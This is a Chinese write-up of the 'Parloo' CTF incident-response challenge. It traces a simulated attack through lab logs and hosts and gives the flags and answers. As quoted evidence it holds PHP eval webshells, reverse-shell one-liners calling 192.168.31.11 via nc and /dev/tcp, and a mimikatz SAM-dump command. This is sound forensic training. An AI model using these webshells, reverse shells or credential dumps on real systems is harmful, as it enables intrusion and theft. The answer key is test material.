Parloo杯应急响应-畸形的爱

简介

by：第二届"Parloo 杯"CTF 应急响应挑战赛-畸形的爱
压缩包密码：Parloo&zgsfsys&onefox&solar**juyt

网络拓扑

资产清单

主机名	操作系统登录	服务登录
WebServer	root/root	webserver/webserver
SQL服务器	sql/sql
Windows7 PC1	administrator/wmx666
Windows10 PC2	administrator/zjl@123

应急响应题目

1.攻击者ip地址1：

登录root用户，查看历史命令，启动了nginx服务，查看nginx日志 过滤发现192.168.31.240大量访问a.php，定位到a.php为一句话木马

故攻击者IP为192.168.31.240

2.攻击者ip地址2：

历史命令发现存在docker服务

靶机给到我们是挂起状态，我们启动时由于架构问题需要重新启动，故手动启动容器

跟进容器网页目录存在clean.sh程序，查看发现反弹shell
192.168.31.11

3.暴力破解开始时间：

docker logs 6801404902b1|grep 192.168.31.240 查看8080服务日志

2025:03:05:58

4.flag1：

在PC2中存在everythins直接全局搜 在Tasks中搜到flag1

palu{pc3_zgsfqwerlkssaw}

5.flag2:

在flag1中存在C:\Program Files (x86)\Microsoft\a.bat
跟进得到
palu{nizhidaowoyouduoainima}

6.flag3:

在/var/www/html首页中获得到数据库账号密码 8080服务刚好为phpmyadmin跟进库看是否存在 在id14中发现flag3

palu{sqlaabbccsbwindows}

钓鱼文件的哈希32位大写

2977CDAB8F3EE5EFDDAE61AD9F6CF203

7.webshell密码1：

在8061服务日志下过滤POST定位到/uploads/shell.php
跟进得到内容
<?php eval($_POST['hack']); ?>
故为hack

8.webshell密码2：

由1可得

/var/www/html/a.php
<?php eval($_POST[00232]); ?>
故为00232

9.攻击者开放端口(1,2,3)

由题二已知8061端口存在clean.sh

echo 'OK';
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.11 1133 >/tmp/f
nc -c sh 192.168.31.11 1133
sh -i >& /dev/tcp/192.168.31.11/1133

有可能是重启了靶机的原因还是 不存在/tmp/.sh 直接取证镜像

/bin/bash -i >& /dev/tcp/192.168.31.11/1144 0>&1

查看PC1端口连接情况

1133,1144,8084

10.隐藏账户的密码：

PC2中存在隐藏用户

导出C:\Windows\System32\config文件夹下的SAM、SYSTEM mimikatz获取ntlm

lsadump::sam /sam:SAM /system:SYSTEM

wmx_love

11.[溯源]攻击者的邮箱：

逆向简历.exe

得到C:\Users\n0k4u\source\repos\Project2\x64\Release\Project2.pdb
直接搜n0k4u用户名搜到github ID

https://api.github.com/users/用户名/events/public

通过https://api.github.com/users/n0k4u/events/public接口
查到邮箱
n0k4u@outlook.com

12.[溯源]flag4：

根据11给的密语搜QQ号得到flag4

palu{loveyouibiejv}